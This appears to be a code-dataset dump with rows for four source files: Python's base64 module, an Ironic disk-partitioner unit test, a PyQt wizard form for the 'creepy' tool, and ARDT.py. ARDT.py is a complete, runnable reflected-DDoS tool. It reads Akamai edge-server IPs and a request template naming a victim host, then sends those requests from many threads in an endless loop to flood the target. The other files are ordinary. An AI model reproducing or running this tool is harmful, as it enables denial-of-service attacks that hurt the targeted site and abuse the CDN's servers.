repo_name | path | copies | size | content | license | hash | line_mean | line_max | alpha_frac | autogenerated
stringlengths 5-100 | stringlengths 4-299 | stringclasses 990 values | stringlengths 4-7 | stringlengths 666-1.03M | stringclasses 15 values | int64 -9,223,351,895,964,839,000 to 9,223,297,778B | float64 3.17-100 | int64 7-1k | float64 0.25-0.98 | bool 1 class
---|---|---|---|---|---|---|---|---|---|---|
kontais/EFI-MIPS | ToolKit/cmds/python/Lib/base64.py | 7 | 11261 | #! /usr/bin/env python
"""RFC 3548: Base16, Base32, Base64 Data Encodings"""
# Modified 04-Oct-1995 by Jack Jansen to use binascii module
# Modified 30-Dec-2003 by Barry Warsaw to add full RFC 3548 support
import re
import struct
import binascii
__all__ = [
# Legacy interface exports traditional RFC 1521 Base64 encodings
'encode', 'decode', 'encodestring', 'decodestring',
# Generalized interface for other encodings
'b64encode', 'b64decode', 'b32encode', 'b32decode',
'b16encode', 'b16decode',
# Standard Base64 encoding
'standard_b64encode', 'standard_b64decode',
# Some common Base64 alternatives. As referenced by RFC 3458, see thread
# starting at:
#
# http://zgp.org/pipermail/p2p-hackers/2001-September/000316.html
'urlsafe_b64encode', 'urlsafe_b64decode',
]
_translation = [chr(_x) for _x in range(256)]
EMPTYSTRING = ''
def _translate(s, altchars):
translation = _translation[:]
for k, v in altchars.items():
translation[ord(k)] = v
return s.translate(''.join(translation))
# Base64 encoding/decoding uses binascii
def b64encode(s, altchars=None):
"""Encode a string using Base64.
s is the string to encode. Optional altchars must be a string of at least
length 2 (additional characters are ignored) which specifies an
alternative alphabet for the '+' and '/' characters. This allows an
application to e.g. generate url or filesystem safe Base64 strings.
The encoded string is returned.
"""
# Strip off the trailing newline
encoded = binascii.b2a_base64(s)[:-1]
if altchars is not None:
return _translate(encoded, {'+': altchars[0], '/': altchars[1]})
return encoded
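# Illustrative usage sketch (added for clarity, not part of the original module;
# assumes Python 2 string semantics, which is what this file targets):
#   encoded = b64encode(raw_bytes, altchars='-_')    # url/filesystem-safe output
#   raw_bytes == b64decode(encoded, altchars='-_')   # round-trips back to the input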
def b64decode(s, altchars=None):
"""Decode a Base64 encoded string.
s is the string to decode. Optional altchars must be a string of at least
length 2 (additional characters are ignored) which specifies the
alternative alphabet used instead of the '+' and '/' characters.
The decoded string is returned. A TypeError is raised if s is
incorrectly padded or if there are non-alphabet characters present in the
string.
"""
if altchars is not None:
s = _translate(s, {altchars[0]: '+', altchars[1]: '/'})
try:
return binascii.a2b_base64(s)
except binascii.Error, msg:
# Transform this exception for consistency
raise TypeError(msg)
def standard_b64encode(s):
"""Encode a string using the standard Base64 alphabet.
s is the string to encode. The encoded string is returned.
"""
return b64encode(s)
def standard_b64decode(s):
"""Decode a string encoded with the standard Base64 alphabet.
s is the string to decode. The decoded string is returned. A TypeError
is raised if the string is incorrectly padded or if there are non-alphabet
characters present in the string.
"""
return b64decode(s)
def urlsafe_b64encode(s):
"""Encode a string using a url-safe Base64 alphabet.
s is the string to encode. The encoded string is returned. The alphabet
uses '-' instead of '+' and '_' instead of '/'.
"""
return b64encode(s, '-_')
def urlsafe_b64decode(s):
"""Decode a string encoded with the standard Base64 alphabet.
s is the string to decode. The decoded string is returned. A TypeError
is raised if the string is incorrectly padded or if there are non-alphabet
characters present in the string.
The alphabet uses '-' instead of '+' and '_' instead of '/'.
"""
return b64decode(s, '-_')
# Base32 encoding/decoding must be done in Python
_b32alphabet = {
0: 'A', 9: 'J', 18: 'S', 27: '3',
1: 'B', 10: 'K', 19: 'T', 28: '4',
2: 'C', 11: 'L', 20: 'U', 29: '5',
3: 'D', 12: 'M', 21: 'V', 30: '6',
4: 'E', 13: 'N', 22: 'W', 31: '7',
5: 'F', 14: 'O', 23: 'X',
6: 'G', 15: 'P', 24: 'Y',
7: 'H', 16: 'Q', 25: 'Z',
8: 'I', 17: 'R', 26: '2',
}
_b32tab = [v for k, v in sorted(_b32alphabet.items())]  # sort by 5-bit value so index matches the encoded value
_b32rev = dict([(v, long(k)) for k, v in _b32alphabet.items()])
def b32encode(s):
"""Encode a string using Base32.
s is the string to encode. The encoded string is returned.
"""
parts = []
quanta, leftover = divmod(len(s), 5)
# Pad the last quantum with zero bits if necessary
if leftover:
s += ('\0' * (5 - leftover))
quanta += 1
for i in range(quanta):
# c1 and c2 are 16 bits wide, c3 is 8 bits wide. The intent of this
# code is to process the 40 bits in units of 5 bits. So we take the 1
# leftover bit of c1 and tack it onto c2. Then we take the 2 leftover
# bits of c2 and tack them onto c3. The shifts and masks are intended
# to give us values of exactly 5 bits in width.
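# Added worked example of the layout: the 5 input bytes form 40 bits read as
# c1 (16 bits) | c2 (16 bits) | c3 (8 bits). Re-reading those 40 bits as eight
# 5-bit groups gives: groups 1-3 from the top 15 bits of c1, group 4 from the
# last bit of c1 plus the first 4 bits of c2 (hence the carry below), groups
# 5-6 from the rest of c2, and groups 7-8 from the 2 carried bits plus c3.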
c1, c2, c3 = struct.unpack('!HHB', s[i*5:(i+1)*5])
c2 += (c1 & 1) << 16 # 17 bits wide
c3 += (c2 & 3) << 8 # 10 bits wide
parts.extend([_b32tab[c1 >> 11], # bits 1 - 5
_b32tab[(c1 >> 6) & 0x1f], # bits 6 - 10
_b32tab[(c1 >> 1) & 0x1f], # bits 11 - 15
_b32tab[c2 >> 12], # bits 16 - 20 (1 - 5)
_b32tab[(c2 >> 7) & 0x1f], # bits 21 - 25 (6 - 10)
_b32tab[(c2 >> 2) & 0x1f], # bits 26 - 30 (11 - 15)
_b32tab[c3 >> 5], # bits 31 - 35 (1 - 5)
_b32tab[c3 & 0x1f], # bits 36 - 40 (1 - 5)
])
encoded = EMPTYSTRING.join(parts)
# Adjust for any leftover partial quanta
if leftover == 1:
return encoded[:-6] + '======'
elif leftover == 2:
return encoded[:-4] + '===='
elif leftover == 3:
return encoded[:-3] + '==='
elif leftover == 4:
return encoded[:-1] + '='
return encoded
def b32decode(s, casefold=False, map01=None):
"""Decode a Base32 encoded string.
s is the string to decode. Optional casefold is a flag specifying whether
a lowercase alphabet is acceptable as input. For security purposes, the
default is False.
RFC 3548 allows for optional mapping of the digit 0 (zero) to the letter O
(oh), and for optional mapping of the digit 1 (one) to either the letter I
(eye) or letter L (el). The optional argument map01, when not None,
specifies which letter the digit 1 should be mapped to (when map01 is not
None, the digit 0 is always mapped to the letter O). For security
purposes the default is None, so that 0 and 1 are not allowed in the
input.
The decoded string is returned. A TypeError is raised if s is
incorrectly padded or if there are non-alphabet characters present in the
string.
"""
quanta, leftover = divmod(len(s), 8)
if leftover:
raise TypeError('Incorrect padding')
# Handle section 2.4 zero and one mapping. The flag map01 will be either
# False, or the character to map the digit 1 (one) to. It should be
# either L (el) or I (eye).
if map01:
s = _translate(s, {'0': 'O', '1': map01})
if casefold:
s = s.upper()
# Strip off pad characters from the right. We need to count the pad
# characters because this will tell us how many null bytes to remove from
# the end of the decoded string.
padchars = 0
mo = re.search('(?P<pad>[=]*)$', s)
if mo:
padchars = len(mo.group('pad'))
if padchars > 0:
s = s[:-padchars]
# Now decode the full quanta
parts = []
acc = 0
shift = 35
for c in s:
val = _b32rev.get(c)
if val is None:
raise TypeError('Non-base32 digit found')
acc += _b32rev[c] << shift
shift -= 5
if shift < 0:
parts.append(binascii.unhexlify('%010x' % acc))
acc = 0
shift = 35
# Process the last, partial quanta
last = binascii.unhexlify('%010x' % acc)
if padchars == 0:
last = '' # No characters
elif padchars == 1:
last = last[:-1]
elif padchars == 3:
last = last[:-2]
elif padchars == 4:
last = last[:-3]
elif padchars == 6:
last = last[:-4]
else:
raise TypeError('Incorrect padding')
parts.append(last)
return EMPTYSTRING.join(parts)
# RFC 3548, Base 16 Alphabet specifies uppercase, but hexlify() returns
# lowercase. The RFC also recommends against accepting input case
# insensitively.
def b16encode(s):
"""Encode a string using Base16.
s is the string to encode. The encoded string is returned.
"""
return binascii.hexlify(s).upper()
def b16decode(s, casefold=False):
"""Decode a Base16 encoded string.
s is the string to decode. Optional casefold is a flag specifying whether
a lowercase alphabet is acceptable as input. For security purposes, the
default is False.
The decoded string is returned. A TypeError is raised if s is
incorrectly padded or if there are non-alphabet characters present in the
string.
"""
if casefold:
s = s.upper()
if re.search('[^0-9A-F]', s):
raise TypeError('Non-base16 digit found')
return binascii.unhexlify(s)
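# Illustrative usage sketch (added; the hex values are easy to check by hand):
#   b16encode('\xfa\xce')             # -> 'FACE'
#   b16decode('face', casefold=True)  # -> '\xfa\xce'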
# Legacy interface. This code could be cleaned up since I don't believe
# binascii has any line length limitations. It just doesn't seem worth it
# though.
MAXLINESIZE = 76 # Excluding the CRLF
MAXBINSIZE = (MAXLINESIZE//4)*3
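# Added note: 76 output characters per line is 76//4 = 19 groups of 4 base64
# characters, so each line encodes 19*3 = 57 raw bytes (MAXBINSIZE).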
def encode(input, output):
"""Encode a file."""
while True:
s = input.read(MAXBINSIZE)
if not s:
break
while len(s) < MAXBINSIZE:
ns = input.read(MAXBINSIZE-len(s))
if not ns:
break
s += ns
line = binascii.b2a_base64(s)
output.write(line)
def decode(input, output):
"""Decode a file."""
while True:
line = input.readline()
if not line:
break
s = binascii.a2b_base64(line)
output.write(s)
def encodestring(s):
"""Encode a string."""
pieces = []
for i in range(0, len(s), MAXBINSIZE):
chunk = s[i : i + MAXBINSIZE]
pieces.append(binascii.b2a_base64(chunk))
return "".join(pieces)
def decodestring(s):
"""Decode a string."""
return binascii.a2b_base64(s)
# Useable as a script...
def test():
"""Small test program"""
import sys, getopt
try:
opts, args = getopt.getopt(sys.argv[1:], 'deut')
except getopt.error, msg:
sys.stdout = sys.stderr
print msg
print """usage: %s [-d|-e|-u|-t] [file|-]
-d, -u: decode
-e: encode (default)
-t: encode and decode string 'Aladdin:open sesame'"""%sys.argv[0]
sys.exit(2)
func = encode
for o, a in opts:
if o == '-e': func = encode
if o == '-d': func = decode
if o == '-u': func = decode
if o == '-t': test1(); return
if args and args[0] != '-':
func(open(args[0], 'rb'), sys.stdout)
else:
func(sys.stdin, sys.stdout)
def test1():
s0 = "Aladdin:open sesame"
s1 = encodestring(s0)
s2 = decodestring(s1)
print s0, repr(s1), s2
if __name__ == '__main__':
test()
| bsd-3-clause | 6,864,509,106,308,675,000 | 30.107735 | 78 | 0.595684 | false |
redhat-openstack/ironic | ironic/tests/common/test_disk_partitioner.py | 3 | 8877 | # Copyright 2014 Red Hat, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import eventlet
import mock
from testtools.matchers import HasLength
from ironic.common import disk_partitioner
from ironic.common import exception
from ironic.common import utils
from ironic.tests import base
@mock.patch.object(eventlet.greenthread, 'sleep', lambda seconds: None)
class DiskPartitionerTestCase(base.TestCase):
def test_add_partition(self):
dp = disk_partitioner.DiskPartitioner('/dev/fake')
dp.add_partition(1024)
dp.add_partition(512, fs_type='linux-swap')
dp.add_partition(2048, bootable=True)
expected = [(1, {'bootable': False,
'fs_type': '',
'type': 'primary',
'size': 1024}),
(2, {'bootable': False,
'fs_type': 'linux-swap',
'type': 'primary',
'size': 512}),
(3, {'bootable': True,
'fs_type': '',
'type': 'primary',
'size': 2048})]
partitions = [(n, p) for n, p in dp.get_partitions()]
self.assertThat(partitions, HasLength(3))
self.assertEqual(expected, partitions)
@mock.patch.object(disk_partitioner.DiskPartitioner, '_exec',
autospec=True)
@mock.patch.object(utils, 'execute', autospec=True)
def test_commit(self, mock_utils_exc, mock_disk_partitioner_exec):
dp = disk_partitioner.DiskPartitioner('/dev/fake')
fake_parts = [(1, {'bootable': False,
'fs_type': 'fake-fs-type',
'type': 'fake-type',
'size': 1}),
(2, {'bootable': True,
'fs_type': 'fake-fs-type',
'type': 'fake-type',
'size': 1})]
with mock.patch.object(dp, 'get_partitions', autospec=True) as mock_gp:
mock_gp.return_value = fake_parts
mock_utils_exc.return_value = (None, None)
dp.commit()
mock_disk_partitioner_exec.assert_called_once_with(
mock.ANY, 'mklabel', 'msdos',
'mkpart', 'fake-type', 'fake-fs-type', '1', '2',
'mkpart', 'fake-type', 'fake-fs-type', '2', '3',
'set', '2', 'boot', 'on')
mock_utils_exc.assert_called_once_with(
'fuser', '/dev/fake', run_as_root=True, check_exit_code=[0, 1])
@mock.patch.object(disk_partitioner.DiskPartitioner, '_exec',
autospec=True)
@mock.patch.object(utils, 'execute', autospec=True)
def test_commit_with_device_is_busy_once(self, mock_utils_exc,
mock_disk_partitioner_exec):
dp = disk_partitioner.DiskPartitioner('/dev/fake')
fake_parts = [(1, {'bootable': False,
'fs_type': 'fake-fs-type',
'type': 'fake-type',
'size': 1}),
(2, {'bootable': True,
'fs_type': 'fake-fs-type',
'type': 'fake-type',
'size': 1})]
fuser_outputs = iter([("/dev/fake: 10000 10001", None), (None, None)])
with mock.patch.object(dp, 'get_partitions', autospec=True) as mock_gp:
mock_gp.return_value = fake_parts
mock_utils_exc.side_effect = fuser_outputs
dp.commit()
mock_disk_partitioner_exec.assert_called_once_with(
mock.ANY, 'mklabel', 'msdos',
'mkpart', 'fake-type', 'fake-fs-type', '1', '2',
'mkpart', 'fake-type', 'fake-fs-type', '2', '3',
'set', '2', 'boot', 'on')
mock_utils_exc.assert_called_with(
'fuser', '/dev/fake', run_as_root=True, check_exit_code=[0, 1])
self.assertEqual(2, mock_utils_exc.call_count)
@mock.patch.object(disk_partitioner.DiskPartitioner, '_exec',
autospec=True)
@mock.patch.object(utils, 'execute', autospec=True)
def test_commit_with_device_is_always_busy(self, mock_utils_exc,
mock_disk_partitioner_exec):
dp = disk_partitioner.DiskPartitioner('/dev/fake')
fake_parts = [(1, {'bootable': False,
'fs_type': 'fake-fs-type',
'type': 'fake-type',
'size': 1}),
(2, {'bootable': True,
'fs_type': 'fake-fs-type',
'type': 'fake-type',
'size': 1})]
with mock.patch.object(dp, 'get_partitions', autospec=True) as mock_gp:
mock_gp.return_value = fake_parts
mock_utils_exc.return_value = ("/dev/fake: 10000 10001", None)
self.assertRaises(exception.InstanceDeployFailure, dp.commit)
mock_disk_partitioner_exec.assert_called_once_with(
mock.ANY, 'mklabel', 'msdos',
'mkpart', 'fake-type', 'fake-fs-type', '1', '2',
'mkpart', 'fake-type', 'fake-fs-type', '2', '3',
'set', '2', 'boot', 'on')
mock_utils_exc.assert_called_with(
'fuser', '/dev/fake', run_as_root=True, check_exit_code=[0, 1])
self.assertEqual(20, mock_utils_exc.call_count)
@mock.patch.object(disk_partitioner.DiskPartitioner, '_exec',
autospec=True)
@mock.patch.object(utils, 'execute', autospec=True)
def test_commit_with_device_disconnected(self, mock_utils_exc,
mock_disk_partitioner_exec):
dp = disk_partitioner.DiskPartitioner('/dev/fake')
fake_parts = [(1, {'bootable': False,
'fs_type': 'fake-fs-type',
'type': 'fake-type',
'size': 1}),
(2, {'bootable': True,
'fs_type': 'fake-fs-type',
'type': 'fake-type',
'size': 1})]
with mock.patch.object(dp, 'get_partitions', autospec=True) as mock_gp:
mock_gp.return_value = fake_parts
mock_utils_exc.return_value = (None, "Specified filename /dev/fake"
" does not exist.")
self.assertRaises(exception.InstanceDeployFailure, dp.commit)
mock_disk_partitioner_exec.assert_called_once_with(
mock.ANY, 'mklabel', 'msdos',
'mkpart', 'fake-type', 'fake-fs-type', '1', '2',
'mkpart', 'fake-type', 'fake-fs-type', '2', '3',
'set', '2', 'boot', 'on')
mock_utils_exc.assert_called_with(
'fuser', '/dev/fake', run_as_root=True, check_exit_code=[0, 1])
self.assertEqual(20, mock_utils_exc.call_count)
@mock.patch.object(utils, 'execute', autospec=True)
class ListPartitionsTestCase(base.TestCase):
def test_correct(self, execute_mock):
output = """
BYT;
/dev/sda:500107862016B:scsi:512:4096:msdos:ATA HGST HTS725050A7:;
1:1.00MiB:501MiB:500MiB:ext4::boot;
2:501MiB:476940MiB:476439MiB:::;
"""
expected = [
{'number': 1, 'start': 1, 'end': 501, 'size': 500,
'filesystem': 'ext4', 'flags': 'boot'},
{'number': 2, 'start': 501, 'end': 476940, 'size': 476439,
'filesystem': '', 'flags': ''},
]
execute_mock.return_value = (output, '')
result = disk_partitioner.list_partitions('/dev/fake')
self.assertEqual(expected, result)
execute_mock.assert_called_once_with(
'parted', '-s', '-m', '/dev/fake', 'unit', 'MiB', 'print',
use_standard_locale=True, run_as_root=True)
@mock.patch.object(disk_partitioner.LOG, 'warn', autospec=True)
def test_incorrect(self, log_mock, execute_mock):
output = """
BYT;
/dev/sda:500107862016B:scsi:512:4096:msdos:ATA HGST HTS725050A7:;
1:XX1076MiB:---:524MiB:ext4::boot;
"""
execute_mock.return_value = (output, '')
self.assertEqual([], disk_partitioner.list_partitions('/dev/fake'))
self.assertEqual(1, log_mock.call_count)
| apache-2.0 | 5,499,461,690,389,595,000 | 43.833333 | 79 | 0.528332 | false |
tdr130/ARDT | ARDT.py | 9 | 4935 | #!/usr/bin/env python
#
######################################
import threading
import re
import sys
import time
import socket
import string
import random
import hashlib
import Queue
c_g = "\033[1;32m"
c_r = "\033[1;31m"
c_y = "\033[1;33m"
c_e = "\033[0m"
target = ""
akamai_ips = []
base_request = ""
threads = []
num_threads = 40
VERSION = "v1.0"
def banner():
print c_g
print "IOKWiOKWiOKWiOKWiOKWiOKVlyDilojilojilojilojilojilojilZcg4paI4paI4paI4paI4paI4paI4pWXIOKWiOKWiOKWiOKWiOKWiOKWiOKWiOKWiOKVlwrilojilojilZTilZDilZDilojilojilZfilojilojilZTilZDilZDilojilojilZfilojilojilZTilZDilZDilojilojilZfilZrilZDilZDilojilojilZTilZDilZDilZ0K4paI4paI4paI4paI4paI4paI4paI4pWR4paI4paI4paI4paI4paI4paI4pWU4pWd4paI4paI4pWRICDilojilojilZEgICDilojilojilZEgICAK4paI4paI4pWU4pWQ4pWQ4paI4paI4pWR4paI4paI4pWU4pWQ4pWQ4paI4paI4pWX4paI4paI4pWRICDilojilojilZEgICDilojilojilZEgICAK4paI4paI4pWRICDilojilojilZHilojilojilZEgIOKWiOKWiOKVkeKWiOKWiOKWiOKWiOKWiOKWiOKVlOKVnSAgIOKWiOKWiOKVkSAgIArilZrilZDilZ0gIOKVmuKVkOKVneKVmuKVkOKVnSAg4pWa4pWQ4pWd4pWa4pWQ4pWQ4pWQ4pWQ4pWQ4pWdICAgIOKVmuKVkOKVnSAgICVzCg==".decode("base64") % VERSION
print c_e
print " Akamai Reflected DDoS Tool\n"
print "\tby @program_ninja"
print " https://github.com/m57/ARDT.git"
print "_" * 37 + "\n"
def usage():
banner()
print "Usage: %s -l [akamai_list] -t [victim_host] -r [request_file] -n [threads (default: 40)] " % sys.argv[0]
print ""
exit()
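# Example invocation matching the usage text above (the list, request file and
# target are placeholders):
#   python ARDT.py -l akamai_ips.txt -r request.txt -t victim.example.com -n 40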
def gen_rand_string():
charset = string.ascii_letters
rand_string = ""
for i in range(1, 15):
rand_string += str(random.randint(1,999999))
rand_string += charset[random.randint(0,len(charset)-1)]
return hashlib.md5(rand_string).hexdigest()
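# Added note: this digest is only substituted for the %RANDOM% placeholder in the
# request template further down, apparently as a throwaway uniqueness token; it has
# no cryptographic role.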
class WorkerThread(threading.Thread):
def __init__(self, qin, tid):
threading.Thread.__init__(self)
self.qin = qin
self.tid = tid
self.kill_received = False
def stop(self):
self.kill_received = True
def run(self):
while not self.kill_received:
while True:
try:
akami_ip = self.qin.get(timeout=1)
except Queue.Empty:
print c_y + "[?] " + c_e + "Queue empty, please wait..."
continue
try:
r = base_request.replace("%RANDOM%", gen_rand_string())
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(2)
s.connect( (akami_ip, 80) )
s.send(r)
ret = s.recv(16).strip()
print c_g + "[Thread '%d' ] Packet => '%s:80' => Response '%s'" % (self.tid, akami_ip, ret) + c_e
s.close()
self.qin.task_done()
except:
print c_r + "[!] " + c_e + "Error contacting '%s:80'" % akami_ip
s.close()
if __name__ == "__main__":
if "-t" not in sys.argv:
t_check = False
else:
t_check = True
if "-l" not in sys.argv or "-r" not in sys.argv:
usage()
if "-n" in sys.argv:
num_threads = int(sys.argv[sys.argv.index("-n")+1])
banner()
akamai_list = sys.argv[sys.argv.index("-l")+1]
request_f = sys.argv[sys.argv.index("-r")+1]
try:
request_file = open(request_f, "r")
base_request = request_file.read()
if "Host: " not in base_request and not t_check:
print c_r + "[!] " + c_e + "'Host: ' field not found in HTTP(s) request file '%s', either set this manually or use '-t www.target.com' in the command line options" % request_f
exit()
elif "Host: " in base_request and not t_check:
reg = "(Host: .*)"
target = re.findall(reg, base_request)[0].split(":")[1].strip()
except:
print c_r + "[!] " + c_e,
print "Error opening request file: '%s'." % request_f
exit()
try:
if t_check:
target = sys.argv[sys.argv.index("-t")+1]
base_request = base_request.strip() + "\r\nHost: %s\r\n\r\n" % target
except:
pass
try:
akami_file = open(akamai_list, "r")
for i in akami_file.readlines():
akamai_ips.append(i.strip())
except:
print c_r + "[!] " + c_e,
print "Error opening Akamai list file: '%s'." % akamai_list
exit()
start_time = time.time()
print c_y + "[?] " + c_e + " Target: '%s'" % target
print c_y + "[?] " + c_e + " Request file: '%s'" % request_f
print c_y + "[?] " + c_e + " Akamai EdgeHosts file ('%s' IP's): '%s'" % ( len(akamai_ips), akamai_list)
print c_y + "[?] " + c_e + " Threads '%d'\n" % num_threads
x = raw_input(c_r + "[!] " + c_e + " This is about to perform a reflected DDoS attack with the above settings.\nAre you sure ? [Y/N] ")
if not (x[:1] == "y" or x[:1] == "Y"):
print c_r + "[!] " + c_e + " Exiting..."
exit()
while True:
qin = Queue.Queue()
try:
for i in range(0, num_threads):
worker = WorkerThread(qin, i)
worker.setDaemon(True)
worker.daemon = True
worker.start()
threads.append(worker)
for ip in akamai_ips:
qin.put(ip)
qin.join()
print c_g + "[*] " + c_e + "All Akamai hosts done, re-looping!"
time.sleep(1)
except KeyboardInterrupt:
print c_r + "[!] " + c_e + "Ctrl+C Caught! Exiting threads..."
for t in threads:
t.stop()
sys.exit(0)
| gpl-2.0 | -5,622,923,735,651,769,000 | 26.416667 | 732 | 0.636272 | false |
jkakavas/creepy | creepy/ui/PersonProjectWizard.py | 7 | 18769 | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file '.\personProjectWizard.ui'
#
# Created: Fri Jan 31 15:30:24 2014
# by: PyQt4 UI code generator 4.9.4
#
# WARNING! All changes made in this file will be lost!
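# Added note: files like this are normally regenerated from the Qt Designer .ui file
# (e.g. `pyuic4 personProjectWizard.ui -o PersonProjectWizard.py`), so lasting changes
# belong in the .ui file or in subclasses rather than here.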
from PyQt4 import QtCore, QtGui
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
_fromUtf8 = lambda s: s
class Ui_personProjectWizard(object):
def setupUi(self, personProjectWizard):
personProjectWizard.setObjectName(_fromUtf8("personProjectWizard"))
personProjectWizard.resize(898, 702)
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap(_fromUtf8(":/creepy/user")), QtGui.QIcon.Normal, QtGui.QIcon.Off)
personProjectWizard.setWindowIcon(icon)
personProjectWizard.setWizardStyle(QtGui.QWizard.ClassicStyle)
personProjectWizard.setOptions(QtGui.QWizard.HelpButtonOnRight)
self.personProjectWizardPage1 = QtGui.QWizardPage()
self.personProjectWizardPage1.setObjectName(_fromUtf8("personProjectWizardPage1"))
self.gridLayoutWidget = QtGui.QWidget(self.personProjectWizardPage1)
self.gridLayoutWidget.setGeometry(QtCore.QRect(0, 0, 861, 591))
self.gridLayoutWidget.setObjectName(_fromUtf8("gridLayoutWidget"))
self.gridLayout_3 = QtGui.QGridLayout(self.gridLayoutWidget)
self.gridLayout_3.setMargin(0)
self.gridLayout_3.setObjectName(_fromUtf8("gridLayout_3"))
self.personProjectDescriptionValue = QtGui.QPlainTextEdit(self.gridLayoutWidget)
self.personProjectDescriptionValue.setPlainText(_fromUtf8(""))
self.personProjectDescriptionValue.setObjectName(_fromUtf8("personProjectDescriptionValue"))
self.gridLayout_3.addWidget(self.personProjectDescriptionValue, 2, 1, 1, 1)
spacerItem = QtGui.QSpacerItem(20, 40, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
self.gridLayout_3.addItem(spacerItem, 3, 1, 1, 1)
self.personProjectNameValue = QtGui.QLineEdit(self.gridLayoutWidget)
self.personProjectNameValue.setObjectName(_fromUtf8("personProjectNameValue"))
self.gridLayout_3.addWidget(self.personProjectNameValue, 0, 1, 1, 1)
self.personProjectNameLabel = QtGui.QLabel(self.gridLayoutWidget)
self.personProjectNameLabel.setEnabled(True)
self.personProjectNameLabel.setObjectName(_fromUtf8("personProjectNameLabel"))
self.gridLayout_3.addWidget(self.personProjectNameLabel, 0, 0, 1, 1)
self.personProjectKeywordsValue = QtGui.QLineEdit(self.gridLayoutWidget)
self.personProjectKeywordsValue.setObjectName(_fromUtf8("personProjectKeywordsValue"))
self.gridLayout_3.addWidget(self.personProjectKeywordsValue, 1, 1, 1, 1)
self.personProjectDescriptionLabel = QtGui.QLabel(self.gridLayoutWidget)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Preferred, QtGui.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.personProjectDescriptionLabel.sizePolicy().hasHeightForWidth())
self.personProjectDescriptionLabel.setSizePolicy(sizePolicy)
self.personProjectDescriptionLabel.setAlignment(QtCore.Qt.AlignLeading|QtCore.Qt.AlignLeft|QtCore.Qt.AlignTop)
self.personProjectDescriptionLabel.setObjectName(_fromUtf8("personProjectDescriptionLabel"))
self.gridLayout_3.addWidget(self.personProjectDescriptionLabel, 2, 0, 1, 1)
self.personProkectKeywordsLabel = QtGui.QLabel(self.gridLayoutWidget)
self.personProkectKeywordsLabel.setObjectName(_fromUtf8("personProkectKeywordsLabel"))
self.gridLayout_3.addWidget(self.personProkectKeywordsLabel, 1, 0, 1, 1)
personProjectWizard.addPage(self.personProjectWizardPage1)
self.personProjectWizardPage2 = QtGui.QWizardPage()
self.personProjectWizardPage2.setObjectName(_fromUtf8("personProjectWizardPage2"))
self.gridLayout = QtGui.QGridLayout(self.personProjectWizardPage2)
self.gridLayout.setObjectName(_fromUtf8("gridLayout"))
self.horizontalLayout = QtGui.QHBoxLayout()
self.horizontalLayout.setObjectName(_fromUtf8("horizontalLayout"))
spacerItem1 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
self.horizontalLayout.addItem(spacerItem1)
self.btnAddTarget = QtGui.QPushButton(self.personProjectWizardPage2)
self.btnAddTarget.setFocusPolicy(QtCore.Qt.NoFocus)
self.btnAddTarget.setStyleSheet(_fromUtf8(""))
self.btnAddTarget.setObjectName(_fromUtf8("btnAddTarget"))
self.horizontalLayout.addWidget(self.btnAddTarget)
self.gridLayout.addLayout(self.horizontalLayout, 5, 3, 1, 1)
self.personProjectSelectedTargetsTable = QtGui.QTableView(self.personProjectWizardPage2)
self.personProjectSelectedTargetsTable.setDragEnabled(False)
self.personProjectSelectedTargetsTable.setDragDropOverwriteMode(True)
self.personProjectSelectedTargetsTable.setDragDropMode(QtGui.QAbstractItemView.DropOnly)
self.personProjectSelectedTargetsTable.setDefaultDropAction(QtCore.Qt.CopyAction)
self.personProjectSelectedTargetsTable.setSelectionMode(QtGui.QAbstractItemView.MultiSelection)
self.personProjectSelectedTargetsTable.setSelectionBehavior(QtGui.QAbstractItemView.SelectRows)
self.personProjectSelectedTargetsTable.setSortingEnabled(True)
self.personProjectSelectedTargetsTable.setObjectName(_fromUtf8("personProjectSelectedTargetsTable"))
self.personProjectSelectedTargetsTable.horizontalHeader().setCascadingSectionResizes(True)
self.personProjectSelectedTargetsTable.horizontalHeader().setStretchLastSection(True)
self.personProjectSelectedTargetsTable.verticalHeader().setVisible(False)
self.personProjectSelectedTargetsTable.verticalHeader().setCascadingSectionResizes(True)
self.gridLayout.addWidget(self.personProjectSelectedTargetsTable, 8, 2, 1, 2)
self.personProjectTargetSeperatorLine = QtGui.QFrame(self.personProjectWizardPage2)
self.personProjectTargetSeperatorLine.setLineWidth(4)
self.personProjectTargetSeperatorLine.setFrameShape(QtGui.QFrame.HLine)
self.personProjectTargetSeperatorLine.setFrameShadow(QtGui.QFrame.Sunken)
self.personProjectTargetSeperatorLine.setObjectName(_fromUtf8("personProjectTargetSeperatorLine"))
self.gridLayout.addWidget(self.personProjectTargetSeperatorLine, 6, 1, 1, 3)
self.personProjectSearchResultsTable = QtGui.QTableView(self.personProjectWizardPage2)
self.personProjectSearchResultsTable.setDragEnabled(True)
self.personProjectSearchResultsTable.setDragDropMode(QtGui.QAbstractItemView.DragDrop)
self.personProjectSearchResultsTable.setSelectionBehavior(QtGui.QAbstractItemView.SelectRows)
self.personProjectSearchResultsTable.setSortingEnabled(True)
self.personProjectSearchResultsTable.setObjectName(_fromUtf8("personProjectSearchResultsTable"))
self.personProjectSearchResultsTable.horizontalHeader().setCascadingSectionResizes(True)
self.personProjectSearchResultsTable.horizontalHeader().setStretchLastSection(True)
self.personProjectSearchResultsTable.verticalHeader().setVisible(False)
self.personProjectSearchResultsTable.verticalHeader().setCascadingSectionResizes(True)
self.personProjectSearchResultsTable.verticalHeader().setMinimumSectionSize(19)
self.personProjectSearchResultsTable.verticalHeader().setStretchLastSection(False)
self.gridLayout.addWidget(self.personProjectSearchResultsTable, 4, 2, 1, 2)
self.personProjectSearchForLabel = QtGui.QLabel(self.personProjectWizardPage2)
